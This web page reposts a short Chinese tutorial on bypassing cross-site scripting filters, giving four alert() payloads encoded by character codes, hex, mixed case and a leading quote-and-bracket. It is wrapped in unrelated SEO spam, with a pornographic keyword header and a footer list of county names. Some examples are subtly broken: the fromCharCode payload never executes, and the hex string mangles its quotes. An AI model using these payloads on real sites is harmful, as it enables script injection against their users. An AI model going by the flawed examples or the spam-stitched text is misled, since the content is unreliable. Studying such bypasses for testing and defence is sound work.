国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 學院 > 常見問題 > 正文

XSS繞過技術 XSS插入繞過一些方式總結

2019-12-18 01:04:37
字體:
來源:轉載
供稿:網友

XSS繞過技術 XSS插入繞過一些方式總結 我們友情進行XSS檢查,偶然跳出個小彈窗,其中我們總結了一些平時可能用到的XSS插入方式,方便我們以后進行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類,至于具體每個類別的異同之處,本文不做學術介紹,直接介紹實際的插入方式


  0x00前言


  我們友情進行XSS檢查,偶然跳出個小彈窗,其中我們總結了一些平時可能用到的XSS插入方式,方便我們以后進行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類,至于具體每個類別的異同之處,本文不做學術介紹,直接介紹實際的插入方式。


  四種超級基礎的繞過方法。


  1.轉換為ASCII碼


  例子:原腳本為<script>alert(‘I love F4ck’)</script >


  通過轉換,變成:


  <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>


  2.轉換為HEX(十六進制)


  例子:原腳本為<script>alert(‘I love F4ck’)</script>


  通過轉換,變成:


  %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e


  3.轉換腳本的大小寫


  例子:原腳本為<script>alert(‘I love F4ck’)</script>


  轉換為:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>


  4.增加閉合標記”>


  例子:原腳本為<script>alert(‘I love F4ck’)</script>


  轉換為:”><script>alert(‘I love F4ck’)</script>


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 枣强县| 陆川县| 新河县| 古浪县| 巴林右旗| 通辽市| 蕲春县| 大兴区| 遵义市| 鞍山市| 吉安县| 平乐县| 清丰县| 长葛市| 上杭县| 济宁市| 万载县| 嫩江县| 同仁县| 合水县| 平顶山市| 高密市| 柯坪县| 松阳县| 德格县| 章丘市| 华阴市| 科尔| 胶南市| 朔州市| 报价| 华池县| 济南市| 曲周县| 墨脱县| 新密市| 宝丰县| 星子县| 象州县| 子长县| 大兴区|